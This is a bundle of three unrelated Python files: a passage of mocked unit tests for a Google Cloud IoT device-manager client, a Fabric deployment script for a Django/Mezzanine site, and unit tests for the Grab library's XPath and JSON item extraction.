expected_response = resources_pb2.DeviceConfig(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
binary_data = b'40'
response = client.modify_cloud_to_device_config(name, binary_data)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.ModifyCloudToDeviceConfigRequest(
name=name, binary_data=binary_data)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_modify_cloud_to_device_config_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
binary_data = b'40'
with pytest.raises(CustomException):
client.modify_cloud_to_device_config(name, binary_data)
def test_list_device_config_versions(self):
# Setup Expected Response
expected_response = {}
expected_response = device_manager_pb2.ListDeviceConfigVersionsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
response = client.list_device_config_versions(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.ListDeviceConfigVersionsRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_device_config_versions_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
with pytest.raises(CustomException):
client.list_device_config_versions(name)
def test_list_device_states(self):
# Setup Expected Response
expected_response = {}
expected_response = device_manager_pb2.ListDeviceStatesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
response = client.list_device_states(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = device_manager_pb2.ListDeviceStatesRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_device_states_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
name = client.device_path('[PROJECT]', '[LOCATION]', '[REGISTRY]',
'[DEVICE]')
with pytest.raises(CustomException):
client.list_device_states(name)
def test_set_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b'21'
expected_response = {'version': version, 'etag': etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
resource = client.registry_path('[PROJECT]', '[LOCATION]',
'[REGISTRY]')
policy = {}
response = client.set_iam_policy(resource, policy)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.SetIamPolicyRequest(
resource=resource, policy=policy)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_set_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
resource = client.registry_path('[PROJECT]', '[LOCATION]',
'[REGISTRY]')
policy = {}
with pytest.raises(CustomException):
client.set_iam_policy(resource, policy)
def test_get_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b'21'
expected_response = {'version': version, 'etag': etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
resource = client.registry_path('[PROJECT]', '[LOCATION]',
'[REGISTRY]')
response = client.get_iam_policy(resource)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.GetIamPolicyRequest(
resource=resource)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
resource = client.registry_path('[PROJECT]', '[LOCATION]',
'[REGISTRY]')
with pytest.raises(CustomException):
client.get_iam_policy(resource)
def test_test_iam_permissions(self):
# Setup Expected Response
expected_response = {}
expected_response = iam_policy_pb2.TestIamPermissionsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup Request
resource = client.registry_path('[PROJECT]', '[LOCATION]',
'[REGISTRY]')
permissions = []
response = client.test_iam_permissions(resource, permissions)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.TestIamPermissionsRequest(
resource=resource, permissions=permissions)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_test_iam_permissions_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = iot_v1.DeviceManagerClient(channel=channel)
# Setup request
resource = client.registry_path('[PROJECT]', '[LOCATION]',
'[REGISTRY]')
permissions = []
with pytest.raises(CustomException):
client.test_iam_permissions(resource, permissions)
| |
from __future__ import print_function, unicode_literals
from future.builtins import input, open
import os
import re
import sys
from functools import wraps
from getpass import getpass, getuser
from glob import glob
from contextlib import contextmanager
from posixpath import join
from fabric.api import env, cd, prefix, sudo as _sudo, run as _run, hide, task
from fabric.contrib.files import exists, upload_template
from fabric.colors import yellow, green, blue, red
################
# Config setup #
################
conf = {}
if sys.argv[0].split(os.sep)[-1] in ("fab", "fab-script.py"):
# Ensure we import settings from the current dir
try:
conf = __import__("settings", globals(), locals(), [], 0).FABRIC
try:
conf["HOSTS"][0]
except (KeyError, ValueError):
raise ImportError
except (ImportError, AttributeError):
print("Aborting, no hosts defined.")
exit()
env.db_pass = conf.get("DB_PASS", None)
env.admin_pass = conf.get("ADMIN_PASS", None)
env.user = conf.get("SSH_USER", getuser())
env.password = conf.get("SSH_PASS", None)
env.key_filename = conf.get("SSH_KEY_PATH", None)
env.hosts = conf.get("HOSTS", [""])
env.proj_name = conf.get("PROJECT_NAME", os.getcwd().split(os.sep)[-1])
env.venv_home = conf.get("VIRTUALENV_HOME", "/home/%s" % env.user)
env.venv_path = "%s/%s" % (env.venv_home, env.proj_name)
env.proj_dirname = "project"
env.proj_path = "%s/%s" % (env.venv_path, env.proj_dirname)
env.manage = "%s/bin/python %s/project/manage.py" % ((env.venv_path,) * 2)
env.domains = conf.get("DOMAINS", [conf.get("LIVE_HOSTNAME", env.hosts[0])])
env.domains_nginx = " ".join(env.domains)
env.domains_python = ", ".join(["'%s'" % s for s in env.domains])
env.ssl_disabled = "#" if len(env.domains) > 1 else ""
env.repo_url = conf.get("REPO_URL", "")
env.git = env.repo_url.startswith("git") or env.repo_url.endswith(".git")
env.reqs_path = conf.get("REQUIREMENTS_PATH", None)
env.gunicorn_port = conf.get("GUNICORN_PORT", 8000)
env.locale = conf.get("LOCALE", "en_US.UTF-8")
env.secret_key = conf.get("SECRET_KEY", "")
env.nevercache_key = conf.get("NEVERCACHE_KEY", "")
##################
# Template setup #
##################
# Each template gets uploaded at deploy time, only if their
# contents has changed, in which case, the reload command is
# also run.
templates = {
"nginx": {
"local_path": "deploy/nginx.conf",
"remote_path": "/etc/nginx/sites-enabled/%(proj_name)s.conf",
"reload_command": "service nginx restart",
},
"supervisor": {
"local_path": "deploy/supervisor.conf",
"remote_path": "/etc/supervisor/conf.d/%(proj_name)s.conf",
"reload_command": "supervisorctl reload",
},
"cron": {
"local_path": "deploy/crontab",
"remote_path": "/etc/cron.d/%(proj_name)s",
"owner": "root",
"mode": "600",
},
"gunicorn": {
"local_path": "deploy/gunicorn.conf.py",
"remote_path": "%(proj_path)s/gunicorn.conf.py",
},
"settings": {
"local_path": "deploy/live_settings.py",
"remote_path": "%(proj_path)s/local_settings.py",
},
}
######################################
# Context for virtualenv and project #
######################################
@contextmanager
def virtualenv():
"""
Runs commands within the project's virtualenv.
"""
with cd(env.venv_path):
with prefix("source %s/bin/activate" % env.venv_path):
yield
@contextmanager
def project():
"""
Runs commands within the project's directory.
"""
with virtualenv():
with cd(env.proj_dirname):
yield
@contextmanager
def update_changed_requirements():
"""
Checks for changes in the requirements file across an update,
and gets new requirements if changes have occurred.
"""
reqs_path = join(env.proj_path, env.reqs_path)
get_reqs = lambda: run("cat %s" % reqs_path, show=False)
old_reqs = get_reqs() if env.reqs_path else ""
yield
if old_reqs:
new_reqs = get_reqs()
if old_reqs == new_reqs:
# Unpinned requirements should always be checked.
for req in new_reqs.split("\n"):
if req.startswith("-e"):
if "@" not in req:
# Editable requirement without pinned commit.
break
elif req.strip() and not req.startswith("#"):
if not set(">=<") & set(req):
# PyPI requirement without version.
break
else:
# All requirements are pinned.
return
pip("-r %s/%s" % (env.proj_path, env.reqs_path))
###########################################
# Utils and wrappers for various commands #
###########################################
def _print(output):
print()
print(output)
print()
def print_command(command):
_print(blue("$ ", bold=True) +
yellow(command, bold=True) +
red(" ->", bold=True))
@task
def run(command, show=True):
"""
Runs a shell comand on the remote server.
"""
if show:
print_command(command)
with hide("running"):
return _run(command)
@task
def sudo(command, show=True):
"""
Runs a command as sudo.
"""
if show:
print_command(command)
with hide("running"):
return _sudo(command)
def log_call(func):
@wraps(func)
def logged(*args, **kawrgs):
header = "-" * len(func.__name__)
_print(green("\n".join([header, func.__name__, header]), bold=True))
return func(*args, **kawrgs)
return logged
def get_templates():
"""
Returns each of the templates with env vars injected.
"""
injected = {}
for name, data in templates.items():
injected[name] = dict([(k, v % env) for k, v in data.items()])
return injected
def upload_template_and_reload(name):
"""
Uploads a template only if it has changed, and if so, reload a
related service.
"""
template = get_templates()[name]
local_path = template["local_path"]
if not os.path.exists(local_path):
project_root = os.path.dirname(os.path.abspath(__file__))
local_path = os.path.join(project_root, local_path)
remote_path = template["remote_path"]
reload_command = template.get("reload_command")
owner = template.get("owner")
mode = template.get("mode")
remote_data = ""
if exists(remote_path):
with hide("stdout"):
remote_data = sudo("cat %s" % remote_path, show=False)
with open(local_path, "r") as f:
local_data = f.read()
# Escape all non-string-formatting-placeholder occurrences of '%':
local_data = re.sub(r"%(?!\(\w+\)s)", "%%", local_data)
if "%(db_pass)s" in local_data:
env.db_pass = db_pass()
local_data %= env
clean = lambda s: s.replace("\n", "").replace("\r", "").strip()
if clean(remote_data) == clean(local_data):
return
upload_template(local_path, remote_path, env, use_sudo=True, backup=False)
if owner:
sudo("chown %s %s" % (owner, remote_path))
if mode:
sudo("chmod %s %s" % (mode, remote_path))
if reload_command:
sudo(reload_command)
def db_pass():
"""
Prompts for the database password if unknown.
"""
if not env.db_pass:
env.db_pass = getpass("Enter the database password: ")
return env.db_pass
@task
def apt(packages):
"""
Installs one or more system packages via apt.
"""
return sudo("apt-get install -y -q " + packages)
@task
def pip(packages):
"""
Installs one or more Python packages within the virtual environment.
"""
with virtualenv():
return sudo("pip install %s" % packages)
def postgres(command):
"""
Runs the given command as the postgres user.
"""
show = not command.startswith("psql")
return run("sudo -u root sudo -u postgres %s" % command, show=show)
@task
def psql(sql, show=True):
"""
Runs SQL against the project's database.
"""
out = postgres('psql -c "%s"' % sql)
if show:
print_command(sql)
return out
@task
def backup(filename):
"""
Backs up the database.
"""
return postgres("pg_dump -Fc %s > %s" % (env.proj_name, filename))
@task
def restore(filename):
"""
Restores the database.
"""
return postgres("pg_restore -c -d %s %s" % (env.proj_name, filename))
@task
def python(code, show=True):
"""
Runs Python code in the project's virtual environment, with Django loaded.
"""
setup = "import os; os.environ[\'DJANGO_SETTINGS_MODULE\']=\'settings\';"
full_code = 'python -c "%s%s"' % (setup, code.replace("`", "\\\`"))
with project():
result = run(full_code, show=False)
if show:
print_command(code)
return result
def static():
"""
Returns the live STATIC_ROOT directory.
"""
return python("from django.conf import settings;"
"print settings.STATIC_ROOT", show=False).split("\n")[-1]
@task
def manage(command):
"""
Runs a Django management command.
"""
return run("%s %s" % (env.manage, command))
#########################
# Install and configure #
#########################
@task
@log_call
def install():
"""
Installs the base system and Python requirements for the entire server.
"""
locale = "LC_ALL=%s" % env.locale
with hide("stdout"):
if locale not in sudo("cat /etc/default/locale"):
sudo("update-locale %s" % locale)
run("exit")
sudo("apt-get update -y -q")
apt("nginx libjpeg-dev python-dev python-setuptools git-core "
"postgresql libpq-dev memcached supervisor")
sudo("easy_install pip")
sudo("pip install virtualenv mercurial")
@task
@log_call
def create():
"""
Create a new virtual environment for a project.
Pulls the project's repo from version control, adds system-level
configs for the project, and initialises the database with the
live host.
"""
# Create virtualenv
with cd(env.venv_home):
if exists(env.proj_name):
prompt = input("\nVirtualenv exists: %s"
"\nWould you like to replace it? (yes/no) "
% env.proj_name)
if prompt.lower() != "yes":
print("\nAborting!")
return False
remove()
run("virtualenv %s --distribute" % env.proj_name)
vcs = "git" if env.git else "hg"
run("%s clone %s %s" % (vcs, env.repo_url, env.proj_path))
# Create DB and DB user.
pw = db_pass()
user_sql_args = (env.proj_name, pw.replace("'", "\'"))
user_sql = "CREATE USER %s WITH ENCRYPTED PASSWORD '%s';" % user_sql_args
psql(user_sql, show=False)
shadowed = "*" * len(pw)
print_command(user_sql.replace("'%s'" % pw, "'%s'" % shadowed))
psql("CREATE DATABASE %s WITH OWNER %s ENCODING = 'UTF8' "
"LC_CTYPE = '%s' LC_COLLATE = '%s' TEMPLATE template0;" %
(env.proj_name, env.proj_name, env.locale, env.locale))
# Set up SSL certificate.
if not env.ssl_disabled:
conf_path = "/etc/nginx/conf"
if not exists(conf_path):
sudo("mkdir %s" % conf_path)
with cd(conf_path):
crt_file = env.proj_name + ".crt"
key_file = env.proj_name + ".key"
if not exists(crt_file) and not exists(key_file):
try:
crt_local, = glob(join("deploy", "*.crt"))
key_local, = glob(join("deploy", "*.key"))
except ValueError:
parts = (crt_file, key_file, env.domains[0])
sudo("openssl req -new -x509 -nodes -out %s -keyout %s "
"-subj '/CN=%s' -days 3650" % parts)
else:
upload_template(crt_local, crt_file, use_sudo=True)
upload_template(key_local, key_file, use_sudo=True)
# Set up project.
upload_template_and_reload("settings")
with project():
if env.reqs_path:
pip("-r %s/%s" % (env.proj_path, env.reqs_path))
pip("gunicorn setproctitle south psycopg2 "
"django-compressor python-memcached")
manage("createdb --noinput --nodata")
python("from django.conf import settings;"
"from django.contrib.sites.models import Site;"
"Site.objects.filter(id=settings.SITE_ID).update(domain='%s');"
% env.domains[0])
for domain in env.domains:
python("from django.contrib.sites.models import Site;"
"Site.objects.get_or_create(domain='%s');" % domain)
if env.admin_pass:
pw = env.admin_pass
user_py = ("from mezzanine.utils.models import get_user_model;"
"User = get_user_model();"
"u, _ = User.objects.get_or_create(username='admin');"
"u.is_staff = u.is_superuser = True;"
"u.set_password('%s');"
"u.save();" % pw)
python(user_py, show=False)
shadowed = "*" * len(pw)
print_command(user_py.replace("'%s'" % pw, "'%s'" % shadowed))
return True
@task
@log_call
def remove():
"""
Blow away the current project.
"""
if exists(env.venv_path):
sudo("rm -rf %s" % env.venv_path)
for template in get_templates().values():
remote_path = template["remote_path"]
if exists(remote_path):
sudo("rm %s" % remote_path)
psql("DROP DATABASE IF EXISTS %s;" % env.proj_name)
psql("DROP USER IF EXISTS %s;" % env.proj_name)
##############
# Deployment #
##############
@task
@log_call
def restart():
"""
Restart gunicorn worker processes for the project.
"""
pid_path = "%s/gunicorn.pid" % env.proj_path
if exists(pid_path):
sudo("kill -HUP `cat %s`" % pid_path)
else:
start_args = (env.proj_name, env.proj_name)
sudo("supervisorctl start %s:gunicorn_%s" % start_args)
@task
@log_call
def deploy():
"""
Deploy latest version of the project.
Check out the latest version of the project from version
control, install new requirements, sync and migrate the database,
collect any new static assets, and restart gunicorn's work
processes for the project.
"""
if not exists(env.venv_path):
prompt = input("\nVirtualenv doesn't exist: %s"
"\nWould you like to create it? (yes/no) "
% env.proj_name)
if prompt.lower() != "yes":
print("\nAborting!")
return False
create()
for name in get_templates():
upload_template_and_reload(name)
with project():
backup("last.db")
static_dir = static()
if exists(static_dir):
run("tar -cf last.tar %s" % static_dir)
git = env.git
last_commit = "git rev-parse HEAD" if git else "hg id -i"
run("%s > last.commit" % last_commit)
with update_changed_requirements():
run("git pull origin master -f" if git else "hg pull && hg up -C")
manage("collectstatic -v 0 --noinput")
manage("syncdb --noinput")
manage("migrate --noinput")
restart()
return True
@task
@log_call
def rollback():
"""
Reverts project state to the last deploy.
When a deploy is performed, the current state of the project is
backed up. This includes the last commit checked out, the database,
and all static files. Calling rollback will revert all of these to
their state prior to the last deploy.
"""
with project():
with update_changed_requirements():
update = "git checkout" if env.git else "hg up -C"
run("%s `cat last.commit`" % update)
with cd(join(static(), "..")):
run("tar -xf %s" % join(env.proj_path, "last.tar"))
restore("last.db")
restart()
@task
@log_call
def all():
"""
Installs everything required on a new system and deploy.
From the base software, up to the deployed project.
"""
install()
if create():
deploy()
| |
# coding: utf-8
from unittest import TestCase
import os
import sys
# Hack environment to force import "item" module from grab/item.py location
root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(0, root)
from lxml.html import fromstring
from grab import Grab, DataNotFound
from grab.item import (Item, IntegerField, StringField, DateTimeField, func_field,
FuncField)
from test.util import build_grab
from grab.tools.lxml_tools import get_node_text, parse_html
from grab.selector import XpathSelector
from grab.error import GrabMisuseError
XML = b"""<?xml version='1.0' encoding='utf-8'?>
<bbapi version='1'>
<player id='26982032' retrieved='2012-09-11T07:38:44Z'>
<firstName>Ardeshir</firstName>
<lastName>Lohrasbi</lastName>
<nationality id='89'>Pakistan</nationality>
<age>19</age>
<height>75</height>
<dmi>14300</dmi>
<comment>abc</comment>
<comment_cdata><![CDATA[abc]]></comment_cdata>
<games>
<game name="quake1"></game>
<game name="quake2"></game>
</games>
</player>
</bbapi>
"""
def calculated_func2(item, sel):
if not hasattr(item, 'count2'):
item.count2 = 1
else:
item.count2 += 1
return sel.select('//height').text() + '-zoo2-' + str(item.count2)
class Player(Item):
id = IntegerField('//player/@id')
first_name = StringField('//player/firstname')
retrieved = DateTimeField('//player/@retrieved', '%Y-%m-%dT%H:%M:%SZ')
comment = StringField('//player/comment')
comment_cdata = StringField('//player/comment_cdata')
data_not_found = StringField('//data/no/found')
@func_field()
def calculated(item, sel):
if not hasattr(item, 'count'):
item.count = 1
else:
item.count += 1
return sel.select('//height').text() + '-zoo-' + str(item.count)
calculated2 = FuncField(calculated_func2, pass_item=True)
@func_field()
def height1(item, sel):
return sel.select('//height').number()
height2 = FuncField(lambda sel: sel.select('//height').number())
class GameItem(Item):
class Meta:
find_query = '//games/game'
name = StringField('@name')
names = StringField('@name', multiple=True)
class ItemTestCase(TestCase):
def get_item(self, content_type=None):
grab = build_grab()
if content_type is not None:
grab.setup(content_type=content_type)
grab.fake_response(XML)
player = Player(grab.tree)
return player
def test_integer_field(self):
player = self.get_item()
self.assertEquals(26982032, player.id)
def test_string_field(self):
player = self.get_item()
self.assertEquals('Ardeshir', player.first_name)
def test_datetime_field(self):
player = self.get_item()
self.assertEquals('2012-09-11 07:38:44', str(player.retrieved))
def test_item_cache_feature(self):
player = self.get_item()
self.assertEquals('75-zoo-1', player.calculated)
# should got from cache
self.assertEquals('75-zoo-1', player.calculated)
# test assigning value
player.calculated = 'baz'
self.assertEquals('baz', player.calculated)
# test FuncField
self.assertEquals('75-zoo2-1', player.calculated2)
# should got from cache
self.assertEquals('75-zoo2-1', player.calculated2)
def test_dom_builder(self):
player = self.get_item()
# By default comment_cdata attribute contains empty string
# because HTML DOM builder is used by default
self.assertEquals('abc', player.comment)
self.assertEquals('', player.comment_cdata)
# We can control default DOM builder with
# content_type option
player = self.get_item(content_type='xml')
self.assertEquals('abc', player.comment)
self.assertEquals('abc', player.comment_cdata)
self.assertRaises(DataNotFound, lambda: player.data_not_found)
def test_func_field_decorator(self):
player = self.get_item()
self.assertEquals(75, player.height1)
def test_func_field(self):
player = self.get_item()
self.assertEquals(75, player.height2)
def test_get_function(self):
func = Player.get_function('height1')
html = '<html><body><height>3'
self.assertEquals(3, func(XpathSelector(parse_html(html))))
func = Player.get_function('height2')
html = '<html><body><height>3'
self.assertEquals(3, func(XpathSelector(parse_html(html))))
def test_func_field_warning(self):
"""
Test that usage of func_field decorators without "()"
raises exception.
"""
def foo():
class TestItem(Item):
@func_field
def foo(self, sel):
return 'test'
self.assertRaises(GrabMisuseError, foo)
def foo():
class TestItem(Item):
@func_field()
def foo(self, sel):
return 'test'
return TestItem(fromstring('<div></div>')).foo
self.assertEqual('test', foo())
def test_unknown_selector_type(self):
class TestItem(Item):
pass
TestItem(None)
self.assertRaises(GrabMisuseError,
lambda: TestItem(None, selector_type='Batman Selector'))
def test_find(self):
grab = build_grab()
grab.fake_response(XML)
games = list(GameItem.find(grab.doc))
self.assertEqual(['quake1', 'quake2'],
[x.name for x in games])
def test_stringfield_multiple(self):
grab = build_grab()
grab.fake_response(XML)
class GameItem(Item):
names = StringField('//game/@name', multiple=True)
game = GameItem(grab.tree)
self.assertEqual(['quake1', 'quake2'], game.names)
def test_item_inheritance(self):
class BaseItem(Item):
class Meta:
find_query = '//player'
name = StringField('firstname')
age = IntegerField('age')
class ChildItem(BaseItem):
name = StringField('lastname')
grab = build_grab(document_body=XML)
items = list(BaseItem.find(grab.doc))
self.assertEqual(items[0].name, 'Ardeshir')
self.assertEqual(items[0].age, 19)
self.assertEqual(set(['name', 'age']), set(items[0]._fields.keys()))
items = list(ChildItem.find(grab.doc))
self.assertEqual(items[0].age, 19)
self.assertEqual(set(['name', 'age']), set(items[0]._fields.keys()))
class JsonSelectorTestCase(TestCase):
class PlanetItem(Item):
class Meta:
find_query = '$..planets[*]'
selector_type = 'json'
name = StringField('name')
def setUp(self):
self.data = {
'existence': {
'worldA': {
'id': 1,
'planets': [
{'name': 'Earth', 'cities': ['Moscow', 'Paris', 'Tokio'],
'population': 7000000000},
{'name': 'Mars', 'cities': [], 'population': 0},
],
},
'worldB': {
'id': 2,
'planets': [
{'name': 'Onyx', 'cities': ['Oyyx', 'Yiiix'], 'population': 8000000},
],
},
},
}
def it_just_works(self):
item = self.PlanetItem(self.data, selector_type='json')
def test_find(self):
planets = list(self.PlanetItem.find(self.data))
self.assertEqual(len(planets), 3)
def test_string_field(self):
planets = list(self.PlanetItem.find(self.data))
self.assertEqual(set(['Earth', 'Mars', 'Onyx']),
set(x.name for x in planets))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.